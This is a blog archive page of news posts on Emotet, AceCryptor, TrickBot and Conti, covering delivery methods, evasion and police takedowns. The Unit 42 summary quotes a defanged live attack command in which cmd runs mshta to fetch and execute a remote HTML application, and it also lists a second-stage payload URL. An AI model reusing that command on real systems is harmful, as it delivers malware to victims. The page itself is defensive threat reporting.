Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Emotet. Show all posts

What is AceCryptor Malware? A Quick Insight


AceCryptor first appeared in the year 2016. Since, this cryptor has been used to pack tens of malware to date, many of its technical components have already been discussed and detailed. We may already be familiar with this cryptor, sometimes referred to as the DJVU obfuscation, SmokeLoader's stage 1, RedLine stealer's stage 1, 2, and 3, easy and popular packer, etc. Let us connect the dots for you by offering not only a technical analysis of its variants but also an overview of the malware families that can be found packed by it and how common AceCryptor is in the wild. Many (but not all) of the published blog posts fail to even recognize this cryptor as a separate malware family.

For malware programmers, protecting their malwares from being detected is a challenge. The first line of protection against malware from getting distributed is cryptors. Threat actors are capable of designing and maintaining their own unique cryptors, however, for crimeware threat actors, keeping their cryptor in a condition known as FUD (fully undetectable) is frequently a time-consuming or technically challenging task. Numerous malware-packed cryptor-as-a-service (CaaS) alternatives have emerged in response to the demand for this protection. These cryptors can combine several anti-VM, anti-debugging, and anti-analysis approaches to achieve payload hiding.

Since its establishment, AceCryptor has been used by several malware programmers. Its services were even used by crimeware like Emotet, which did not have its own cryptor at that time. During 2021-22, software company ESET found more than 80,000 different AceCryptor samples. It is believed that AceCryptor is offered somewhere as a CaaS due to the significant variety of malware families that are crammed inside. Even if we are not aware of the exact cost of this service, if we take into account the number of unique files found, we may conclude that the benefits to the AceCryptor creators are indeed not insignificant.

Taking into account that AceCryptor is used by a wide range of threat actors, malware packed by it is also distributed in a variety of ways. Based on ESET telemetry, devices were primarily exposed to AceCryptor-packed malware through spam emails with dangerous attachments or trojanized installers of piracy software.

Additionally, other malware that downloads new malware protected by AceCryptor may as well expose a user to AceCryptor-packed malware. The Amadey botnet, which we have seen downloading an AceCryptor-packed RedLine Stealer, serves as an example.

Currently, AceCryptor works as a significantly long-lasting cryptor-malware. It is anticipated that it is offered as a CaaS on some dark web or underground forums. Tens of different malware families have utilized the services of this virus, and many of them rely on this cryptor as their primary defense against static detections.

Since this malware is used by several threat actors, it is capable of affecting anyone. Considering the diversity of packed malware, it is challenging to predict how severe the repercussions are for a victim. AceCryptor may have been downloaded by additional malware or may have been dropped by other malware that was already active on the victim's computer. If the victim was directly affected, such as by opening a malicious email attachment, it may be very challenging to clean the compromised system.

Microsoft: Hackers Exploring New Attack Techniques

Malicious actors are adapting their strategies, techniques, and procedures in response to Microsoft's move to automatically block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros across Office programs (TTPs).

Malicious Microsoft Office document attachments sent in phishing emails often contain VBA and XL4 Macros, two short programs designed to automate repetitive processes in Microsoft Office applications that threat actors use to load, drop, or install malware.

Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, stated "the threat landscape has changed significantly as a result of threat actors shifting away from directly disseminating macro-based email attachments."

The change was made as a result of Microsoft's announcement that it will stop the widespread exploitation of the Office subsystem by making it more challenging to activate macros and automatically banning them by default.

New tactics 

Use of ISO, RAR, and Windows Shortcut (LNK) attachments to get around the block has multiplied by 66%, according to security firm Proofpoint, which calls this activity 'one of the largest email threat landscape shifts in recent history.' Actors spreading the Emotet malware are also involved in this activity.

The use of container files like ISOs, ZIPs, and RARs has also increased rapidly, increasing by about 175 percent. These are rapidly being used as initial access mechanisms by threat actors, between October 2021 and June 2022, the use of ISO files surged by over 150 percent.

Since October 2021, the number of campaigns including LNK files has climbed by 1,675%. Proofpoint has been tracking a variety of cybercriminal and advanced persistent threat (APT) actors who frequently use LNK files.

Emotet, IcedID, Qakbot, and Bumblebee are some of the famous malware families disseminated using these new techniques.

According to Proofpoint, the usage of HTML attachments employing the HTML smuggling approach to put a botnet on the host system has also increased significantly. Their distribution volumes, however, are still quite limited.

Finally, with a restricted range of potential threats to assess, email security systems are now more likely to detect hazardous files.

New Emotet Variant Capturing Users' Credit Card Data from Google Chrome

 

The Emotet botnet is now attempting to infect potential victims with a credit card stealer module designed to capture credit card information from Google Chrome user accounts. 

After obtaining credit card information (such as name, expiration month and year, and card numbers), the malware will transfer it to command-and-control (C2) servers that are not the same as those used by the Emotet card stealer module. 

The Proofpoint Threat Insights team said, "On June 6th, Proofpoint observed a new Emotet module being dropped by the E4 botnet. To our surprise, it was a credit card stealer that was solely targeting the Chrome browser. Once card details were collected they were exfiltrated to different C2 servers than the module loader." 

This shift in behaviour follows an increase in activity in April and a move to 64-bit modules, as discovered by the Cryptolaemus security research group. One week later, Emotet began using Windows shortcut files (.LNK) to run PowerShell instructions on victims' devices, abandoning Microsoft Office macros, which were disabled by default beginning in early April 2022. 

The re-emergence of Emotet malware:

In 2014, the Emotet malware was created and used in assaults as a banking trojan. It has developed into a botnet used by the TA542 threat group (also known as Mummy Spider) to deliver second-stage payloads. 

It also enables its operators to steal user data, conduct reconnaissance on compromised networks, and migrate laterally to susceptible devices. Emotet is renowned for deploying Qbot and Trickbot malware trojan payloads on infected PCs, which are then used to spread more malware, such as Cobalt Strike beacons and ransomware like Ryuk and Conti. Emotet's infrastructure was destroyed in early 2021 as part of an international law enforcement operation that also resulted in the arrest of two people.

When Emotet research organisation Cryptolaemus, computer security firm GData, and cybersecurity firm Advanced Intel all spotted the TrickBot malware being used to deliver an Emotet loader in November 2021, the botnet returned utilising TrickBot's previously established infrastructure.

According to ESET, Emotet's activity has increased more than 100-fold since the beginning of the year, with its activity rising more than 100-fold against T3 2021.

Costa Rica's New Government is Under Attack by a Conti Ransomware Gang

 

The Conti ransomware organization, which has hacked some Costa Rican government computer systems, has increased its threat, claiming that its ultimate goal is to overthrow the government. The Russian-speaking Conti gang tried to intensify the pressure to pay a ransom by boosting its demand to $20 million, perhaps capitalizing on the fact that President Rodrigo Chaves had just been in office for a week. 

"We are aiming to overthrow the government by a cyber attack, and we have already demonstrated all of our strength and power," the group stated on its official website. "In your government, we have insiders. We're also attempting to obtain access to your other systems, and you have no choice but to pay us." Chaves said the organization had infiltrated up to 27 institutions at various levels of government, declaring that the country was "at war" with the Conti ransomware gang but giving no indication that the ransom would be paid. 

"I appeal to every Costa Rican to go to your government and organize rallies to demand that they pay us as soon as possible if your existing government is unable to fix the situation?" A different statement on Conti's dark web page stated, "Perhaps it's worth replacing." Over the weekend, the ransomware issued a warning that it will remove the decryption keys in a week, making it impossible for Costa Rica to restore access to the ransomware-encrypted files. 

The lethal April 19 attack prompted the new administration to proclaim a state of emergency, and the gang has exposed troves of data acquired from infected systems before encryption. Conti linked the attack to an affiliate actor nicknamed "UNC1756," a play on the name given to uncategorized threat groups by threat intelligence firm Mandiant. 

If it was any other ransomware gang, according to Aaron Turner, vice president of SaaS posture at Vectra, an AI cybersecurity firm, the threat would be unnoticeable. "However, because it's Conti, and Conti has publicly connected themselves with Putin's Russia's military activities, this threat should demand a second look," he said. 

He believes that if the US supports 'enemy' troops in Russia's neighborhood, there is a strong urge for retaliation. "Fortunately for Costa Rica, Conti isn't the most sophisticated gang of ransomware operators," he said. "Costa Rica is also lucky in that Russia's invasion of Ukraine went so badly that there are likely inadequate military forces on the other side of the planet to launch a combined cyberattack and conventional strike." While the prospect of overthrow is intriguing from an academic standpoint, Turner believes the chances of Conti orchestrating a coup are extremely remote. 

Affiliates are hacker organizations that rent access to pre-developed ransomware tools to coordinate assaults on corporate networks as part of the so-called ransomware-as-a-service (RaaS) gig economy, and then share the profits with the operators. Conti has continued to target companies all over the world after suffering a large data breach of its own earlier this year amid its public support for Russia in its current war against Ukraine. 

Conti is the "most prolific ransomware-associated cybercriminal activity organization operational today," according to Microsoft's security team, which records the cybercriminal gang under the cluster DEV-0193. "DEV-0193 has hired developers from other malware operations that have shut down for varied reasons, including legal actions. The addition of developers from Emotet, Qakbot, and IcedID to the DEV-0193 umbrella is very noteworthy." 

Conti is one of the most wanted cybercriminal gangs in the world, with the US State Department offering up to $10 million in incentives for any information leading to the identity of its senior members.

Emotet : The Infamous Botnet Has Returned

 

Kaspersky researchers were able to retrieve and analyze 10 out of 16 modules, with most having been used by Emotet in the past in one form or another. Kaspersky Lab was created in 1997 as multinational cybersecurity and digital privacy organization. Kaspersky's deep risk intelligence and security expertise are continually evolving into new security solutions and services to safeguard enterprises, vital infrastructure, governments, and consumers all around the world. 

Emotet was discovered in the wild for the first time in 2014. Its major purpose back then was to steal user's financial credentials. Since then, it has gone through several modifications, began transmitting other viruses, and eventually evolved into a strong botnet. Emotet is a type of malware classified as banking Trojans. Malspam, or spam emails with malware, is the most common way for it to propagate. To persuade users, these communications frequently contain familiar branding, imitating the email structure of well-known and trustworthy companies such as PayPal or DHL. 

As per Kaspersky telemetry, the number of victims increased from 2,843 in February 2022 to 9,086 in March 2022, indicating the attackers targeted more than three times the number of users. As a result, the number of threats detected by Kaspersky solutions has increased, from 16,897 in February 2022 to 48,597 in March 2022. 

A typical Emotet infection starts with spam e-mails containing malicious macros in Microsoft Office attachments. The actor can use this macro to launch a malicious PowerShell command which will drop and start a module loader, which will then talk with a command and control server to download and start modules. In the percent Windows percent SysWOW64 or percent User percent AppDataLocal directory, Emotet creates a subfolder with a random name and replicates itself under a completely random name and extension. The exported Control RunDLL method is used to launch the Emotet DLL's primary activity. These modules can be used to carry out a range of actions on the infected computer. Kaspersky researchers were able to extract and evaluate 10 of the 16 modules, the majority of which had previously been utilized by Emotet. 

Researchers now state that the Emotet can download 16 modules judging by the recent Emotet protocol and C2 answers. They were able to recover ten of them (including two separate copies of the Spam module), which were utilized by Emotet to steal credentials, passwords, accounts, and e-mail addresses, as well as spam. We present a brief examination of these modules and also statistics on current Emotet attacks in this post. 

To gather the account details of various email clients, the current version of Emotet can create automated spam campaigns which are further spread down the network from infected devices, retrieving emails and email addresses from Thunderbird and Outlook apps and accumulating passwords from popular web browsers like Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 

Emotet infects computers in businesses and homes all around the world. As per our telemetry, Emotet most frequently targeted users from the following countries in Q1 2022: Italy (10.04%), Russia (9.87%), Japan (8.55%), Mexico (8.36%), Brazil (6.88%), Indonesia (4.92%), India (3.21%), Vietnam (2.70%), China (2.62), Germany (2.19%) and Malaysia (2.13%). 

The present set of components is capable of a wide range of malicious activities, including stealing e-mails, passwords, and login data from a variety of sources, as well as spamming. Except for the Thunderbird components, Emotet has utilized all of these modules in some form or another before. However, there are still a few modules that we haven't been able to get our hands-on.

TrickBot Group Likely Moving Operations to Switch to New Malware

 

TrickBot, the notorious Windows crimeware-as-a-service (CaaS) solution used by several threat actors to distribute next-stage payloads like ransomware, looks to be in the midst of a transition, with no new activity since the beginning of the year. 

Researchers at Intel 471 stated in a study provided with The Hacker News that the slowdown in malware activities is partially due to a huge shift by Trickbot's operators, including working with the operators of Emotet. Even as the malware's command-and-control (C2) infrastructure continued to serve additional plugins and web injects to infected nodes in the botnet, the last round of TrickBot attacks was recorded on December 28, 2021. 

Surprisingly, the drop in campaign volume has coincided with the TrickBot gang collaborating closely with the operators of Emotet, which resurfaced late last year after a 10-month break due to law enforcement efforts to combat the malware. The attacks, which began in November 2021, comprised an infection sequence that utilized TrickBot to download and execute Emotet binaries, whereas Emotet binaries were frequently used to drop TrickBot samples previous to the shutdown. 

The researchers stated, "It's likely that the TrickBot operators have phased TrickBot malware out of their operations in favour of other platforms, such as Emotet. TrickBot, after all, is relatively old malware that hasn't been updated in a major way." 

Additionally, immediately after Emotet's comeback in November 2021, Intel 471 discovered instances of TrickBot sending Qbot installs to the infected systems, highlighting the possibility of a behind-the-scenes shake-up to relocate to other platforms. With TrickBot becoming more visible to law enforcement in 2021, it's not unexpected that the threat actor behind it is actively working to change tactics and modify their protective mechanisms. 

"Perhaps a combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it. We suspect that the malware control infrastructure (C2) is being maintained because there is still some monetization value in the remaining bots," the researchers added.

According to a separate investigation published last week by Advanced Intelligence (AdvIntel), the Conti ransomware group is thought to have acqui-hired several elite TrickBot developers to deactivate the malware and replace it with improved variations like BazarBackdoor.

Malicious Excel Files are Now Being Used to Spread Emotet Malware

 

Researchers discovered that the infamous Emotet malware has altered methods yet again, this time in an email campaign propagated by infected Excel files. In a report released online on Tuesday, researchers from Palo Alto Networks Unit 42 detected a new infection strategy for the high-volume malware, which is known to alter and change its attack vectors to avoid detection and continue its malicious job. 

Emotet was found in 2014 as a banking trojan, and it has been quite active in recent years. The Emotet botnet infrastructure was taken down in January 2021 by law enforcement and judicial agencies, but Emotet resurfaced in November 2021 and has remained active since then. Thread hijacking is a common attack tactic used by Emotet. This method generates bogus responses based on legitimate emails obtained from mail clients of Emotet-infected Windows hosts. This stolen email data is used by the botnet to generate false replies imitating the original senders. 

The new attack vector, found on December 21 and still active, sends an Excel file with an obfuscated Excel 4.0 macro via socially engineered emails. These macros are an ancient Excel feature that malicious actors routinely exploit. Before the malicious content can be activated, the victim must enable macros on a vulnerable Windows host. 

When the macro code is enabled, cmd.exe is executed to launch mshta.exe with an argument to obtain and run a remote HTML application. In order to avoid static detection methods, the code employs hex and character obfuscation, cmd /c mshta hxxp://91.240.118[.]168/se/s.html is the deobfuscated command string that is executed. The HTML application has been heavily obfuscated. It will download and run additional PowerShell code.

The first PowerShell script is obfuscated and connects to hxxp://91.240.118[.]168/se/s.png. This URL delivers a text-based script for a second-stage set of PowerShell code aimed at retrieving an Emotet binary. This second-stage PowerShell code contains 14 URLs that will be used to retrieve the Emotet binaries. 

Each URL is tried until an Emotet binary is successfully downloaded. The use of numerous URLs strengthens this assault in the case that one of the URLs is taken down. As the final stage of this attack chain, the Emotet DLL loads an encrypted PE from its resource area. 

“Emotet’s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,” Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.

Emotet Spam Campaigns Use Unconventional IP Addresses to Avoid Detection

 

Trend Micro discovered Emotet spam campaigns that used hexadecimal and octal representations of IP addresses to avoid detection using pattern matching. Both processes rely on social engineering to deceive users into enabling document macros and automate malware execution. When these standards are received, operating systems (OS) automatically transform the data to the dotted decimal quad representation in order to commence the request from remote servers.

Users and enterprises are advised to detect, block, and enable the appropriate security measures to prevent compromise while using Emotet for second-stage malware transmission such as TrickBot and Cobalt Strike. 

Emotet first surfaced in 2014, when researchers found a relatively simple banking Trojan transmitted via phishing emails. It evolved several times over the years into a Malware-as-a-Service botnet, allowing access to compromised computers to those willing to pay. Unfortunately, there were a plethora of them, including ransomware gangs like Ryuk and the data-stealing malware Trickbot. These immediately took advantage of the initial access provided by Emotet, picking and choosing which victims to target with subsequent payloads. 

According to Europol, Emotet's capability to move laterally among devices on a network made it one of the most durable pieces of malware detected in recent years. In reality, it has become one of the most serious threats researchers have seen in recent years, constantly ranking among the top ten campaigns detected, with over 1.6 million victim machines, according to the DoJ. 

The samples researchers discovered begin with an email-attached document that employs Excel 4.0 Macros, an antiquated technology intended to automate repetitive processes in Excel that malicious actors have exploited to distribute malware. In this scenario, abusing the feature allows the malware to execute once the document is opened using the auto-open macro. Carets are used to obfuscate the URL, and the host contains a hexadecimal representation of the IP address. 

When the macro is run, it invokes cmd.exe > mshta.exe with the URL containing the hex representation of the IP address as an argument, which downloads and executes HTML application (HTA) code from the remote host. 

Between November and December 2021, traces of Emotet were seen arbitrarily dropping Cobalt Strike beacons. However, during this year, operators were notably more picky about which targets the beacons were dropped on. Evasion strategies like this could be interpreted as proof that attackers are continuing to innovate in order to defeat pattern-based detection technologies. Furthermore, the atypical use of hexadecimal and octal IP addresses may result in evasion of current solutions reliant on pattern matching.

Criminals Targeted Security Gaps at Financial Services Firms as Employees Moved to WFH

 

According to a report released on Tuesday by the international Financial Stability Board (FSB), criminals targeted security flaws at financial services organizations as their employees switched to working from home. The Financial Stability Board (FSB) was established after the G20 London meeting in April 2009 to offer non-binding recommendations on the global financial system and to coordinate financial policies for the G20 group of nations. 

“Working from home (WFH) arrangements propelled the adoption of new technologies and accelerated digitalization in financial services,” the report states. Phishing, spyware, and ransomware were used to target workers at home. Between February 2020 and April 2021, the number of crimes increased from less than 5000 per week to more than 200,000 per week. 

On July 8, 2021, the Cyber Security Agency of Singapore (CSA) released data suggesting that cybercrime accounted for 43% of all crime in the city-state in 2020. "Although the number of phishing incidents remained stable and website defacements declined slightly, malicious cyber activities remain a concern amid a rapidly evolving global cyber landscape and increased digitalization brought about by the COVID-19 pandemic," said the agency. 

Ransomware attacks increased by 154% from 35 in 2019 to 89 in 2020, ranging from "indiscriminate, opportunistic attacks" to "Big Game Hunting," according to the CSA. They also used leak and shame techniques, as well as RaaS (Ransomware-as-a-Service) models. Between 2019 and 2020, the number of hostile command-and-control servers increased by 94%, with Emotet and Cobalt Strike malware accounting for one-third of the total. 

As IT departments tried to secure remote workers, increased dependence on virtual private networks and unsecured WiFi access points “posed new types of hurdles in terms of patching and other cyber security issues,” according to the FSB assessment. External providers, according to the research, also built cracks for hackers to exploit. According to the report, "While outsourcing to third-party providers, such as cloud services, seems to have enhanced operational resilience at financial institutions, increased reliance on such services may give rise to new challenges and vulnerabilities." 

Working from home isn't going away any time soon. According to Gartner, nearly half of knowledge employees will be working remotely by 2022. Even Apple's retail team follows a hybrid work schedule. Institutions' cyber risk management systems, incident reporting, response and recovery efforts, and how they manage cloud and other third-party services should all be adjusted properly, according to the FSB.

International Law Enforcement Takes Down Emotet Malware in a Joint Operation

 

Emotet, one of the most dangerous email spam botnets in recent history, is being wiped out today from all infected devices with the help of a malware module delivered in January by law enforcement. The botnet's takedown is the result of an international law enforcement action that allowed investigators to take control of the Emotet's servers and disrupt the malware's operation. 

This specifically designed malware code forced the Emotet to self-destruct on Sunday, April 25. The code was distributed at the end of January to Emotet-infected computers by the malware's command-and-control (C2) infrastructure, which had just been seized in an international law enforcement operation.

After the takedown operation, law enforcement pushed a new configuration to active Emotet infections so that the malware would begin to use command and control servers controlled by the Bundeskriminalamt, Germany's federal police agency. Law enforcement then distributed a new Emotet module in the form of a 32-bit EmotetLoader.dll to all infected systems that automatically uninstalled the malware on Sunday.

“The EmotetLoader.dll is a 32-bit DLL responsible for removing the malware from all infected computers. This will ensure that all services related to Emotet will be deleted, the run key in the Windows registry is removed – so that no more Emotet modules are started automatically – and all running Emotet processes are terminated,” Mariya Grozdanova, a threat intelligence analyst at Redscan, stated.

Emotet was particularly nasty in that it spread mainly via malicious attachments in spam emails, and once installed, could bring in additional malware: infected machines were rented out to crooks to install things like ransomware and code that drained victims' online bank accounts. Computer security biz Digital Shadows highlighted the extent of the Emotet epidemic and said its removal is an overall win for everyone. 

Paul Robichaux, senior director of product management at IT forensics firm Quest, stated to The Register: “These kinds of large-scale, coordinated attacks and global botnets are too big for individual organizations to resolve entirely themselves, and leaving individual companies to clean them up themselves is a legitimate national security problem. However, the fact that law enforcement is on the case is no excuse to let your guard down. You still need to focus on securing your own environments.”

Operation LadyBird: International Law Enforcement Agencies Crackdown Emotet

 

European and US law agencies earlier this week directed a brilliant crackdown on Emotet. Emotet is a botnet of corrupted computers, which has attacked millions of victims to date. The international police operation "LadyBird" consisted of a team of officials from nine governments. The Dutch police, however, was more resolute and used its cyber agencies to get access to the Emotet infrastructure. Next, it installed a software update on the servers which disrupted the communication between botnet and hacked computers, putting a stop to its further spread.  

FBI can learn a thing or two from this operation, realizing that sometimes foreign allies can be a help too. Here, the Dutch police were a step ahead of the bureau in making an arrest and even using offensive cyber capabilities to get the mission done. The Bureau had first discovered Emotet in 2017, by that time, it had already dealt damage of $1.4 Million to North Carolina school computers. As per the Department of Homeland Security (DHS), it cost the agency around $1 Million to settle the dust after each Emotet incident happened, however, not clear how the agency calculated this data. 

An FBI agent, however, suggested the estimated total cost to be around hundreds of millions of dollars, that the U.S victims might have suffered from the digital cyberattack. But, American agents failed to reach Emotet's infrastructural roots on their own. A senior FBI cyber-official in a press conference said that this is why it becomes so important for law enforcement agencies to work together. Hinting to the Dutch crackdown on Emotet, the official said "working within the legal frameworks of each individual partner to make sure that we have the greatest impact that we can within the law."  As of now, it's not confirmed if the Emotet's criminal group will be back in the action again. 

Experts say that Botnet generally survives until its operatives are finally captured. Dutch news website Politie reports, "A computer infection with Emotet malware often comes about through a phishing attack by email. In doing so, the victim is tempted to click on a malicious link, for example in a PDF file, or to open a Word file containing macros. The cybercriminals behind Emotet used different types of 'bait' to trick unsuspecting users into opening malicious attachments. For example, last year they pretended that e-mail attachments contained information about COVID-19."

Emotet - 'Most Dangerous Malware in the World' Disrupted by the Law Enforcement Agencies

 

The European Union Agency for Law Enforcement announced that a global collaboration of law enforcement agencies had disrupted Emotet, what it called the ‘most dangerous malware in the world’.

‘Operation ladybird’ was conducted via a collaboration of private security experts with global law enforcement agencies to disrupt Emotet and take charge of Emotet’s command-and-control infrastructure. While conducting the raid Ukrainian police arrested at least two Ukrainian citizens working for the cybercriminal group.

Ukrainian law enforcement published a video showing officers seizing cash, computer equipment, and rows of gold bars. Neither Europol nor the Ukrainian police has shared the details regarding threat actors or their asserted role in the Emotet group. Ukrainian authorities released a statement explaining that “other members of an international hacker group who used the infrastructure of the Emotet bot network to conduct cyberattacks have also been identified. Measures are being taken to detain them”.

Europol stated that “the Emotet infrastructure essentially acted as a primary door opener for computer systems on a global scale”. A malware globally known as Emotet has jeopardized the free-flowing working of the Internet and has grown into one of the biggest botnets across the globe and ruining organizations with data theft and ransomware.

In 2014, Emotet was initially known as a banking trojan, the malware gradually evolved into a powerful weapon used by threat actors across the globe to secure unauthorized access to computer systems. Emotet’s designers known as APT group TA542 shared the malware with other threat actors who used malware to install banking trojans or ransomware, onto a victim’s computer system.

Interpol stated that “the infrastructure that was used by Emotet involved several hundreds of servers located across the world, all of these having different functionalities to manage the computers of the infected victims, to spread to new ones, to serve other criminal groups, and to ultimately make the network more resilient against takedown attempts”.

Emotet Returns: Here's a Quick Look into new 'Windows Update' attachment

 

Emotet Malware was first discovered by security researchers in the year 2014, but, the threats by Emotet have constantly evolved over the years. At present, the malware is highly active as its developers continue to evolve their strategies, devising more sophisticated tricks and advancements. Recently, it has been noticed to be delivering several malware payloads and is also one of the most active and largest sources of malspam as of now. 
 
The operators behind Emotet are sending spam emails to unsuspected victims to trick them into downloading the malware; botnet has started to employ a new malicious attachment that falsely claims to be a message from Windows Update asking victims to upgrade Microsoft Word. It begins by sending spam email to the victim containing either a download link or a Word document, now when the victim happens to ‘Enable Content’ to let macros run on their system, the Emotet Trojan gets installed. In their previous malspam campaigns, used by the criminals were said to be from Office 365 and Windows 10 Mobile. 
 

How does the malware works? 

 
Once installed, the malware tries to sneak into the victim’s system and acquire personal information and sensitive data. Emotet uses worm-like capabilities that help it spreading itself to other connected PCs. With add-ons to avoid detection by anti-malware software, Emotet has become one of the most expensive and dangerous malware, targeting both governments as well as private sectors. 

The malware keeps updating the way it delivers these malicious attachments as well as their appearances, ensuring prevention against security tools. The subject lines used in a particular malspam campaign are replaced by new ones, the text in the body gets changed and lastly the ‘file attachment type’ and the content of it are timely revised. 
 
Emotet malware has continuously evolved to the levels of technically sophisticated malware that has a major role in the expansion of the cybercrime ecosystem. After a short break, the malware made a comeback with full swing on October 14th and has started a new malspam routine. 
 
Originally discovered as a simple banking Trojan, Emotet’s roots date back to 2014 when it attempted to steal banking credentials from comrpmised machines. As per recent reports, Emotet also delivers third-party payloads such as IcedID, Qbot, The Trick, and Gootkit.

Emotet Malware Returned with Massive Malspam Campaign


The Emotet authors are popular for capitalizing on trending events and holidays by disseminating customized templates in form of Christmas and Halloween gathering invites, similarly, the malicious gang has started a new campaign taking advantage of the ongoing global pandemic. They are once again spamming corona virus-related emails to U.S businesses.

Earlier this year, in the month of February, the Emotet malware was being spread actively in pandemic ridden countries via COVID-19 themed spam. However, regarding the US businesses, the malware never had the timely chance to attack by exploiting the pandemic, as the virus encapsulated the USA in the month of March. After disappearing in February, Emotet was seen to be back stronger than ever on July 17th, 2020.

Originally designed as a banking malware, Emotet Malware was first discovered by security researchers in the year 2014, but, the threats by Emotet have constantly evolved over the years. It attempts to sneak onto the victim’s system and acquire personal information and sensitive data. Emotet uses worm-like capabilities that help it spreading itself to other connected PCs. With added functionalities to avoid detection by anti-malware software, Emotet has become one of the most expensive and dangerous malware, targeting both governments as well as private sectors. As per recent sources, Emotet also delivers third-party payloads such as IcedID, Qbot, The Trick, and Gootkit.

Emotet has been pushing malspam continually employing the same strategies the authors did in their previous array of attacks. The spam mail consists of an attachment or a link, that on being clicked, launches the Emotet payload. In this particular COVID-19 themed Emotet spam targeting U.S organizations, the malware has been sending an email that appears to be from the ‘California Fire Mechanics’ reaching out with a ‘May Covid-19 update.’ One important thing to note here is that this email is not a template designed by the Emotet authors, but instead, an email stolen from a prior victim and appropriated into the Emotet’s spam campaigns. The malicious attachment linked in this case is titled ‘EG-8777 Medical report COVID-19. Doc’. It makes use of a generic document template that had been used in older campaigns. Once downloaded on the user’s click, the Emotet gets saved to the %UserProfile% folder under a three-digit number (name), such as 745.exe. Upon execution of the same, the user’s computer will become a part of the operation, sending out further infected emails.

While alerting on 17th July, researchers at Microsoft told,“We have so far seen several hundreds of unique attachments and links in tens of thousands of emails in this campaign,”

“The download URLs typically point to compromised websites, characteristic of Emotet operations.” They further wrote.

Emotet expert Joseph Roosen told to BleepingComputer, "So far we have only seen it as part of stolen reply chain emails. We have not seen it as a generic template yet but I am sure it is just around the corner hehe. There was one reply chain I saw yesterday that was sent to 100s of addresses that were referring to the closing of an organization because of COVID-19. I would not be surprised if Ivan is filtering some of those reply chains to focus on ones that are involving COVID-19,"

Botnet Activity Goes Down; Revived Emotet Suffers Hindrances in Operations by A Vigilante Hacker


An anonymous vigilante hacker has been actively involved in obstructing 2019's most widespread cybercrime operation, Emotet that made a comeback recently. He has been sabotaging the malicious affairs and protecting users from getting affected by removing Emotet payloads and inserting animated GIFs at their places. Acting as an intruder, he replaced Emotet payloads with animated GIFs on certain hacked WordPress sites, meaning when victims would open the infected Office files, the malware would not be downloaded and executed on their computers, saving them from the infection.

Emotet is a banking Trojan that was first spotted in the year 2014 by security researchers, it was primarily designed to sneak onto the victim's computer and mine sensitive data. Later, the banking malware was updated; newer versions came up with spamming and malware delivery functionality. Emotet is equipped with capabilities to escape anti-malware detection, it uses worm-like abilities that help it proliferate through connected systems. Mainly, the infection is spread via malspam, however, it may also be sent through malicious scripts, links, or macro-enabled documents.

Started off casually a few days ago, on the 21st of July, the act of sabotaging the operations has become a major concern for the Emotet authors, affecting a significant fragment of the malware botnet’s revived campaign. Essentially, the sabotage has been possible owing to the fact that Emotet authors are not employing the best web shells in the market, it was noted earlier in 2019 also that the criminals involved in Emotet operations were using open-source scripts and identical password for all the web shells, risking the security of its infrastructure and making it vulnerable to hijacks just by a simple guess of password.

While giving insights on the matter, Kevin Beaumont said in 2019, “The Emotet payload distribution method is super insecure, they deploy an open-source webshell off Github into the WordPress sites they hack, all with the same password, so anybody can change the payloads infected PCs are receiving.

Emotet trojan is back with a bang

Emotet gang takes their operation to a whole new level, showing why they're today's most dangerous malware. It would seem it now has taken on new tactics in the form of hijacking users old email chains and then responding from a spoofed address to portray legitimacy, this additional tactic can heighten a hackers chances when stealing financial information once a victim has been lured into clicking on said malicious content. Targeted emails appears to affect both private and public sectors, including government, particularly those that provide financial and banking services.

Emotet is a known banking Trojan, discovered five years ago, first in Europe and the USA. It started out stealing information from individuals, like credit card details. It has been lurking around since 2014 and has evolved tremendously over the years, becoming major threat that infiltrates corporate networks and spreads other strains of malware.

It injects itself into a user’s device via malspam links or attachments, with the intent to steal financial data. It targets banking emails and can sometimes deploy further attacks once inside a device.

The Emotet malware gang is now using a tactic that has been previously seen used by nation-state hackers.

The U.S. Department of Homeland Security published an alert on Emotet in July 2018, describing it as “an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans,” and warning that it’s very difficult to combat, capable of evading typical signature-based detection, and determined to spread itself. The alert explains that “Emotet infections have cost SLTT (state, local, tribal, and territorial) governments up to $1 million per incident to remediate.”

This campaign targeted mainly Chile and used living off the land techniques (LotL) to bypass Virus Total detections. This up and coming tactic uses already installed tools on a users’ device to remain undetected for as long as possible.